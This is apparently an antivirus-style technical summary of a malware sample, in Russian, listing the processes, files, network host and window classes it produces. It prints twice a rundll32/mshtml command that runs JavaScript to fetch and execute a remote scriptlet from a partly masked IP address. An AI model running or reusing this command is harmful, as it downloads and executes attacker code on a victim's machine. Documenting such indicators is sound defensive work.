Техническая информация
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://13.##.179.221/news/newone');
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\475647.cvr
- '13.##.179.221':80
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://13.##.179.221/news/newone');' (со скрытым окном)